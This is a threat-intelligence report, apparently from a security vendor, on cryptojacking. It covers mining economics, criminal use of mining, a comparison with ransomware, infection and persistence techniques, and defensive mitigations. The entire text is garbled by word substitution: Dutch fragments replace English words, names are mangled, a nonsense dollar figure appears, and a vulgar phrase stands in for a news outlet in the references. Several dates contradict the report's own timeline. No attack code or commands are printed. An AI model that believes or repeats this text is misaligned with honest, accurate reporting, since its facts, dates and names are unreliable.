During 2018, the cryptocurrency market grew almost 20-fold, reportedly enhancing from approximately $Legal billion to more than $600 billion (USD). Those gains amplified threat actors&rsquo, rente ter accessing the computing resources of compromised systems to mine cryptocurrency. Secureworks®, incident response (IR) analysts responded to numerous incidents of unauthorized cryptocurrency mining ter 2018, and network and host telemetry demonstrated a proliferation of this threat across Secureworks managed security service clients. Financially motivated threat actors will proceed to use malware infections to deploy cryptocurrency mining software for spil long spil it remains profitable.
Compared to finish loss of availability caused by ransomware and loss of confidentiality caused by banking trojans or other information stealers, the influence of unauthorized cryptocurrency mining on a host is often viewed spil more of a nuisance. However, the cumulative effect of large-scale unauthorized cryptocurrency mining te an enterprise environment can be significant spil it consumes computational resources and compels business-critical assets to slow down or zekering functioning effectively.
Furthermore, the deployment and persistence of unauthorized cryptocurrency mining software ter an environment reflects a breakdown of effective technical controls. If activity of this nature can become established and spread laterally within the environment, then more instantaneously harmful threats such spil ransomware could spil well. The technical controls used to mitigate the delivery, persistence, and propagation of unauthorized cryptocurrency miners are also very effective against other types of threat.
- This threat can have a significant influence. If critical and high-availability assets are infected with cryptocurrency mining software, then computational resources could become unusable for their primary business function. Powerful processing fountains could accelerate hardware failure, and energy costs could be significant for an organization with thousands of infected hosts.
- Unauthorized cryptocurrency mining indicates insufficient technical controls. If it is possible for an initial malware infection to produce and spread cryptocurrency miners within an environment without being detected, then that same access vector could be used to produce a broad range of other threats.
- The threat of cryptocurrency mining malware enlargened te 2018. Financially motivated threat actors are drawn to its low implementation cost, high comeback on investment, and arguably lower risk of law enforcement activity than traditional malware because the influence is less visible or disruptive.
- The upward trend of cryptocurrency miner infections will proceed while they offerande a positive terugwedstrijd on investment. Threat actors may cautiously manage the influence on an infected host to reduce the likelihood of detection and remediation.
- Organizations should also establish a position on legal forms of cryptocurrency mining such spil browser-based mining. While this form of mining has a legitimate use, organizations might still consider it an unacceptable use of corporate resources.
Cryptocurrency mining economics
The idea of using a decentralized electronic payment method that relies on cryptographic proof, known spil a cryptocurrency, has existed since at least 2008 when an anonymous author using the pseudonym &lsquo,Satoshi Nakamoto&rsquo, published a paper outlining the Bitcoin concept. Albeit Bitcoin wasgoed reportedly used to purchase goods for the very first time te May 2010, serious discussions of its potential spil an accepted form of currency began ter 2011, which coincided with the emergence of other cryptocurrencies. There were approximately 1,370 cryptocurrencies spil of December 2018 with fresh currencies added every day, albeit many cryptocurrencies cannot be mined. The price and volatility of popular cryptocurrencies surged te late 2018 (see Figure 1).
Figure 1. Market price of various cryptocurrencies from January 2015 to March 2018. (Source: CoinGecko)
Te cryptocurrency &lsquo,mining,&rsquo, computational power is expended to add transactions to a public ledger, or blockchain. Miners receive cryptocurrency spil a prize and spil an incentive to increase the supply of miners. Consequently, cryptocurrency mining can be profitable for spil long spil the prize outweighs the hardware and energy costs. Bitcoin&rsquo,s prize rate is based on how quickly it adds transactions to the blockchain, the rate decreases spil the total Bitcoin te circulation converges on a predefined limit of 21 million. Most other cryptocurrencies are modeled on Bitcoin&rsquo,s architecture and concepts, but they may modify features such spil transaction privacy or the predefined circulation limit to attract potential investors.
Individuals who want to mine a cryptocurrency often join a mining &lsquo,pool.&rsquo, Adding transactions to the blockchain, thereby receiving a prize, requires computers to contest to be the very first to solve a sophisticated mathematical puzzle. Aggregating computing power, and then splitting any prizes received among the contributors, is a more profitable way of mining cryptocurrency than individual efforts. Pools are not required to disclose information about the number of active miners ter their pool, making it difficult to estimate the number of active miners and mining applications.
Cryptocurrency mining criminality
Cryptocurrency is attractive to financially motivated threat actors spil a payment method and spil a way to generate revenue through mining:
- The decentralized nature of many cryptocurrencies makes disruptive or investigative activity by central banks and law enforcement challenging.
Reports of Bitcoin mining spil a criminal activity emerged ter 2011 spil Bitcoin became widely known. Te August 2011, the Secureworks Toonbank Threat Unit&trade, (CTU) research team analyzed a peer-to-peer botnet installing Bitcoin mining software. Ter July 2014, CTU&trade, researchers observed an unknown threat actor redirecting cryptocurrency miners&rsquo, connections to attacker-controlled mining pools and earning approximately $83,000 ter slightly more than four months. Inbetween 2014 and 2018, there were several notable developments te cryptocurrency mining malware:
- Cryptocurrency mining malware developers quickly incorporated very effective technics for delivery and propagation. The Apache Struts vulnerability used to compromise Equifax ter mid-2018 wasgoed exploited spil a delivery mechanism for the Zealot multi-platform campaign that mined Monero cryptocurrency. The SMBv1 vulnerabilities disclosed by the Shadow Brokers threat group te April 2018 and exploited by the WCry ransomware ter May 2018 were used to produce the Adylkuzz mining malware spil early spil late-April 2018. The combination of SMBv1 exploits and the Mimikatz credential-theft instrument used by the NotPetya malware te June 2018 has bot used to distribute Monero mining software.
Figure Two. CoinHive code inserted into CBS&rsquo,s Showtime webstek. (Source: The Register)
Threat actors exploit any chance to generate revenue, and their activity can affect unknowing facilitators spil well spil the end victim. For example, ter December 2018, a customer at a Starbucks te Brazil noticed that the store&rsquo,s public Wi-Fi imposed a ten-second delay when web browsers connected to the network so that CoinHive code could mine a few seconds of Monero from connecting hosts. Starbucks responded swiftly and confirmed the malicious activity exploited the store&rsquo,s third-party Internet service.
Albeit cryptocurrency mining is legal, using a corporate system may crack an organization&rsquo,s acceptable use policies and result ter law enforcement act. The influence to an individual host is the consumption of processing power, IR clients have noted surges te computing resources and effects on business-critical servers. This influence is amplified te large-scale infections.
To demonstrate the influence that mining software can have on an individual host, Figure Trio shows Advanced Endpoint Threat Detection (AETD) – Crimson Cloak&trade, detecting the XMRig cryptocurrency miner running spil a service on an infected host. XMRig is advertised spil a loosely available high-performance Monero CPU miner with official utter Windows support.
Figure Three. XMRig cryptocurrency miner running spil local service on an infected host. (Source: Secureworks)
XMRig accepts several variables spil inputs (see Figure Four), including the wallet, a username and password if required, and the number of threads to open on the system.
Figure Four. XMRig command-line options. (Source: Secureworks)
Figure Five illustrates the influence on an idling host when the miner uses four threads to consume spare computing capacity. Overheen time, this spectacle blast coerces the host to work tighter, which also generates higher energy costs.
Figure Five. CPU utilization spike after executing XMRig miner software. (Source: Secureworks)
Cryptocurrency mining versus ransomware
After gaining the capability to run software on a compromised system, a threat actor chooses how to monetize the system. Te 2018, CTU researchers reported that many financially motivated threat actors had shifted to using ransomware rather than traditional banking trojans, which have higher costs ter terms of malware development and maintaining money muling networks. Cryptocurrencies facilitated the popularity of ransomware by making payment tracking and account disruption more difficult. Individual payments from successful ransomware extortion can be lucrative, ter some cases exceeding $1 million. However, there is a significant chance that victims will not pay the ransom, and that ransomware campaigns will receive law enforcement attention because the victim influence is instantaneous and very visible.
Te tegenstelling, a victim may not notice cryptocurrency mining spil quickly because it does not require capitulation, its influence is less instantaneous or visible, and miners do not render gegevens and systems unavailable. Thesis factors may make mining more profitable than deploying ransomware. If the threat actor manages resource requests so that systems do not crash or become unusable, they can deploy miners alongside other threats such spil banking trojans to create extra revenue. Threat actors could also determine to deploy ransomware after mining cryptocurrency on a compromised network for a final and higher value payment before shifting concentrate to a fresh target.
Secureworks iSensor telemetry inbetween 2013 and 2018 related to Bitcoin and the popular Stratum mining protocol indicates an increase te mining activity across Secureworks clients. Intrusion detection system events are not a reliable indicator overheen time due to the addition of clients and better detections spil network countermeasures evolve. Even accounting for thesis factors, the gegevens shows that the trajectory of criminals&rsquo, unauthorized Bitcoin mining activity broadly matches the enlargening value of Bitcoin (see Figure 6). There wasgoed a noticeable acceleration around October 2016.
Figure 6. Bitcoin price compared to iSensor detections for Bitcoin network traffic on Secureworks client networks inbetween December 2013 and February 2018. (Sources: Secureworks and bitcoincharts.com)
Client telemetry shows a similar increase ter CoinHive traffic since its launch ter September 2018. While CoinHive activity is typically a legitimate, if sometimes controversial, form of revenue generation, organizations need to consider how to manage the influence to corporate systems.
Tactics, mechanisms, and procedures
Secureworks IR analysts often find cryptocurrency mining software during engagements, either spil the primary cause of the incident or alongside other malicious artifacts. Most identified cryptocurrency miners generate Monero, very likely because threat actors believe it provides the best come back on investment. Unlike Bitcoin, Monero makes mining more equitable for computers with less computational power, which is suitable for exploiting a large number of standard corporate computing assets.
The technologies that Secureworks IR analysts have observed threat actors using to install and spread miners ter affected environments align with common methods that CTU researchers have encountered te other types of intrusion activity. Threat actors will use the most effective mechanisms to create a large network of infected hosts that mine cryptocurrency.
Legitimate cryptocurrency miners are widely available. Underground forums opoffering obfuscation, malware builders, and botnet access to hide illegitimate mining (see Figure 7).
Figure 7. Forum advertisement for builder applications to create cryptocurrency mining malware. (Source: Secureworks)
Delivery, exploitation, and installation
Initial access and installation often leverage an existing malware infection that resulted from traditional technologies such spil phishing. Secureworks IR analysts commonly identify mining malware alongside downloader scripts or other commodity threats such spil Trickbot that could be used to build botnets or download extra payloads. Attackers could exploit feeble authentication on externally facing services such spil Opstopping Transfer Protocol (FTP) servers or Terminal Services (also known spil Remote Desktop Protocol (RDP)) via brute-force attacks or by guessing the default password to build up access. Threat actors could also exploit remote code execution vulnerabilities on outer services, such spil the Oracle WebLogic Server, to download and run mining malware. Social media platforms such spil Facebook Messenger and trojanized mobile apps have bot manhandled to supply a cryptocurrency miner payload.
Because each example of cryptocurrency mining malware leisurely generates revenue, persistence is critical to accumulate significant comes back. CTU researchers have observed a range of persistence mechanisms borrowed from traditional malware, including Windows Management Instrumentation (WMI) event consumers, scheduled tasks, autostart Windows services, and registry modifications. For example, threat actors have set cron jobs on Linux systems to periodically download mining software onto the compromised host if it is not already present (see Figure 8). A threat actor could also minimize the amount of system resources used for mining to decrease the odds of detection.
Figure 8. Script setting cron job to periodically download and run mining software if not already present on Linux host. (Source: Secureworks)
Miner malware payloads are often propagated using lateral movement. Threat actors have used malware that copies itself to mapped drives using inherited permissions, created remote scheduled tasks, used the SMBv1 EternalBlue exploit, and employed the Mimikatz credential-theft instrument. Ter one incident, threat actors added iframe content to an FTP directory that could be rendered ter a web browser so that browsing the directory downloaded the malware onto the system. This technology has also bot observed on Internet-facing websites. Miner malware has also attempted to propagate overheen the Internet by brute force or by using default passwords for Internet-facing services such spil FTP, RDP, and Server Message Block (SMB).
Figure 9 lists the top recommendations that Secureworks IR analysts provided after detecting cryptocurrency mining malware ter clients&rsquo, networks te 2018.
Figure 9. Recommendations provided during Secureworks IR engagements involving cryptocurrency malware. (Source: Secureworks)
Thesis recommendations address mechanisms used by cryptocurrency miners and threat actors ter compromised environments. Open RDP and other remote access protocols, or known vulnerabilities te Internet-facing assets, are often exploited for initial access. After compromising an environment, a threat actor could use PowerShell or remote scheduled tasks to install mining malware on other hosts, which is lighter if the process attempting to access other hosts has elevated privileges. The most effective means of identifying mining malware on infected hosts is through endpoint threat detection agents or antivirus software, and decently placed intrusion detection systems can also detect cryptocurrency mining protocols and network connections. Comprehensive and centralized logging is critical for a response team to understand the scale and timeline of an incident when mining malware has infected numerous hosts.
Network defenders should incorporate the following tactical mitigations into their overall security control framework. Thesis mitigations are effective against a broad range of threats:
- Disable unnecessary services, including internal network protocols such spil SMBv1 if possible. Liquidate applications that have no legitimate business function, and consider restricting access to integral system components such spil PowerShell that cannot be liquidated but are unnecessary for most users.
Cryptocurrency mining is an attractive proposition for threat actors seeking to monetize unauthorized access to computing resources. It will remain a threat to organizations spil long spil criminals can generate profit with minimal overhead and risk. There has bot a significant increase te cryptocurrency mining activity across the Secureworks client base since July 2018.
Albeit cryptocurrency malware may not seem spil serious spil threats such spil ransomware, it can have a significant influence on business-critical assets. Organizations should ensure that adequate technical controls are te place. The mitigations for installation, persistence, and lateral movement mechanisms associated with cryptocurrency malware are also effective against commodity and targeted threats.
Bort, Julie. &ldquo,May 22 Is Bitcoin Pizza Day Thanks To Thesis Two Pizzas Worth $Five Million Today.&rdquo, Business Insider. May 21, 2014. http://www.businessinsider.com/may-22-bitcoin-pizza-day-2014-5?IR=T
Kelion, Leo. &ldquo,Starbucks cafe’s wi-fi made computers mine crypto-currency.&rdquo, Big black cock. December 13, 2018. http://www.big black cock.co.uk/news/technology-42338754
Nakamoto, Satoshi. &ldquo,Bitcoin: A Peer-to-Peer Electronic Specie System.&rdquo, Bitcoin.org. October 31, 2008. https://bitcoin.org/bitcoin.pdf
wh1sks. &ldquo,The ShadowBrokers may have received up to 1500 Monero (